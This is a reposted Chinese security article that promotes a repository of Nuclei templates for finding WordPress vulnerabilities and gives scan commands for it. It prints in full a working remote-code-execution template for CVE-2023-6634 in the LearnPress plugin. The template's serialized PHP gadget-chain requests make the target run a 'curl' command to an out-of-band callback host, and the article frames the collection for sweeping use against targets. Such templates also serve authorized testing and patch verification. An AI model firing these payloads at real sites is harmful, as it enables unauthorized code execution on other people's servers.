该项目提供了大量最新的 Nuclei 模板集合,可用于扫描 WordPress 中的漏洞。这些模板基于 Wordfence.com 的漏洞报告。
其中包含以下漏洞
漏洞描述
WordPress LearnPress插件在4.2.5.7版本及以下的所有版本中存在命令注入漏洞,该漏洞是由于插件在get_content函数中使用了call_user_func函数与用户输入进行交互。这使得未经身份验证的攻击者有可能执行任意带有一个参数的公共函数,可能导致远程代码执行。
id: CVE-2023-6634info:name: LearnPress < 4.2.5.8 - Remote Code Executionauthor: iamnoooob,rootxharsh,pdresearchseverity: highdescription: |The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.remediation: Fixed in 4.2.5.8reference:- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-command-injection- https://wpscan.com/vulnerability/909580f4-1306-4e61-ac7d-e7a2eb0961f8/- https://nvd.nist.gov/vuln/detail/CVE-2023-6634classification:cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:Hcve-id: CVE-2023-6634cvss-score: 8.1cwe-id: CWE-200metadata:max-request: 3verified: truepublicwww-query: "/wp-content/plugins/learnpress"tags: cve,cve2023,wordpress,wp,wp-plugin,learnpress,rcevariables:oast: "{{interactsh-url}}/?"padstr: "{{randstr}}"finalurl: "{{padding(oast,padstr,59)}}"http:- raw:- |+GET /wp-json/lp/v1/load_content_via_ajax/?callback={"class"%3a"LP_Debug","method"%3a"var_dump"}&args="{{randstr}}" HTTP/1.1Host: {{Hostname}}- |+GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args="O%3a13%3au0022WP_HTML_Tokenu0022%3a2%3a{s%3a13%3au0022bookmark_nameu0022%3bs%3a64%3au0022curl+{{finalurl}}u0022%3bs%3a10%3au0022on_destroyu0022%3bs%3a6%3au0022systemu0022%3b}" HTTP/1.1Host: {{Hostname}}Connection: close- |+GET /wp-json/lp/v1/load_content_via_ajax/?callback={"class":"LP_Helper","method":"maybe_unserialize"}&args="O%3a8%3au0022WP_Themeu0022%3a2%3a{s%3a7%3au0022headersu0022%3bO%3a13%3au0022WP_Block_Listu0022%3a2%3a{s%3a6%3au0022blocksu0022%3ba%3a1%3a{s%3a4%3au0022Nameu0022%3ba%3a1%3a{s%3a9%3au0022blockNameu0022%3bs%3a12%3au0022Parent+Themeu0022%3b}}s%3a8%3au0022registryu0022%3bO%3a22%3au0022WP_Block_Type_Registryu0022%3a1%3a{s%3a22%3au0022registered_block_typesu0022%3bO%3a8%3au0022WP_Themeu0022%3a2%3a{s%3a7%3au0022headersu0022%3bN%3bs%3a6%3au0022parentu0022%3bO%3a22%3au0022WpOrg\Requests\Sessionu0022%3a3%3a{s%3a3%3au0022urlu0022%3bs%3a10%3au0022http%3a//p%3a0u0022%3bs%3a7%3au0022headersu0022%3ba%3a1%3a{i%3a0%3bs%3a64%3au0022curl+{{finalurl}}u0022%3b}s%3a7%3au0022optionsu0022%3ba%3a1%3a{s%3a5%3au0022hooksu0022%3bO%3a20%3au0022WpOrg\Requests\Hooksu0022%3a1%3a{s%3a5%3au0022hooksu0022%3ba%3a1%3a{s%3a23%3au0022requests.before_requestu0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3au0022WpOrg\Requests\Hooksu0022%3a1%3a{s%3a5%3au0022hooksu0022%3ba%3a1%3a{s%3a15%3au0022http%3a//p%3a0/Nameu0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3au0022systemu0022%3b}}}}i%3a1%3bs%3a8%3au0022dispatchu0022%3b}}}}}}}}}}s%3a6%3au0022parentu0022%3bN%3b}" HTTP/1.1Host: {{Hostname}}stop-at-first-match: truematchers:- type: dsldsl:- "contains_any(interactsh_protocol, 'http', 'dns')"- "contains(body, 'Error: data content invalid!')"- "contains(body_1, '<pre>{{randstr}}</pre>') "- "status_code == 200"condition: and# digest: 490a0046304402205002f6195eaefea73553bdcf83fc5daf92741b3675f1f3d5f4e075739f6e9c36022069c042d48dd3c713a30aee6fe387f41ef069a86de3d7dd08e228b4ef13fbff79:922c64590222798bb761d5b6d8e72950
对于任何想要扫描基于 WordPress 的网站中的漏洞的人来说,该项目都是宝贵的资源。这些模板易于使用且是最新的,并且它们是开源的,因此您可以修改它们以满足您的特定需求。如果您负责使用 WordPress 的网站的安全性,我强烈建议您使用此项目来扫描漏洞。
特征
-
这些模板易于使用,并且可以使用单个命令运行。
-
这些模板基于 Wordfence.com 的漏洞报告。
-
模板会定期更新,以确保它们始终与最新的漏洞保持同步。
-
这些模板是开源的,因此您可以修改它们以满足您的特定需求。
-
可以标记手动增强的模板以避免覆盖它们。
用法
要使用模板,您需要安装 Nuclei 和此nuclei-wordfence-cve存储库。安装 Nuclei 后,您可以运行以下命令来扫描漏洞:
nuclei -t github/topscoder/nuclei-wordfence-cve -u https://target.com
安装
要安装此nuclei-wordfence-cve存储库,您可以使用以下命令:
export GITHUB_TEMPLATE_REPO=topscoder/nuclei-wordfence-cve
nuclei -update-templates
例子
以下是如何使用模板的一些示例:
-
要扫描WordPress 中的所有已知漏洞,您可以运行以下命令:
nuclei -t github/topscoder/nuclei-wordfence-cve -u https://target.com
-
要扫描CVE 特定漏洞,您可以运行以下命令:
nuclei -t github/topscoder/nuclei-wordfence-cve -template-id cve-2023-32961 -u https://target.com
-
要仅扫描严重漏洞,可以运行以下命令:
nuclei -t github/topscoder/nuclei-wordfence-cve -severity critical -u https://target.com
-
要仅扫描WordPress 核心漏洞,可以运行以下命令:
nuclei -t github/topscoder/nuclei-wordfence-cve -tags wp-core -u https://target.com
-
要仅扫描WordPress 插件漏洞,可以运行以下命令:
nuclei -t github/topscoder/nuclei-wordfence-cve -tags wp-plugin -u https://target.com
-
要仅扫描WordPress 主题漏洞,可以运行以下命令:
nuclei -t github/topscoder/nuclei-wordfence-cve -tags wp-theme -u https://target.com
-
要变得狂野,你可以组合、组合、组合:
nuclei -t github/topscoder/nuclei-wordfence-cve -tags wp-plugin,wp-theme -severity critical,high
-
要更疯狂,您可以使用模板条件标志 (
-tc),它允许复杂的表达式,如下所示:
nuclei -t github/topscoder/nuclei-wordfence-cve -template-condition "contains(to_lower(name),'cross-site scripting') || contains(to_upper(name),'XSS')" -u https://target.com
nuclei -t github/topscoder/nuclei-wordfence-cve -template-condition "contains(to_lower(name),'sql injection') || contains(to_lower(description),'sql injection')" -u https://target.com
nuclei -t github/topscoder/nuclei-wordfence-cve -template-condition "contains(to_lower(name),'file inclusion') || contains(to_lower(description),'file inclusion')" -u https://target.com
nuclei -t github/topscoder/nuclei-wordfence-cve -template-condition "contains(to_upper(name),'CSRF') || contains(to_upper(description),'CSRF')" -u https://target.com
贡献
原文始发于微信公众号(TKing的安全圈):Nuclei截至2024年模板集合-准备好一把梭哈了没
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论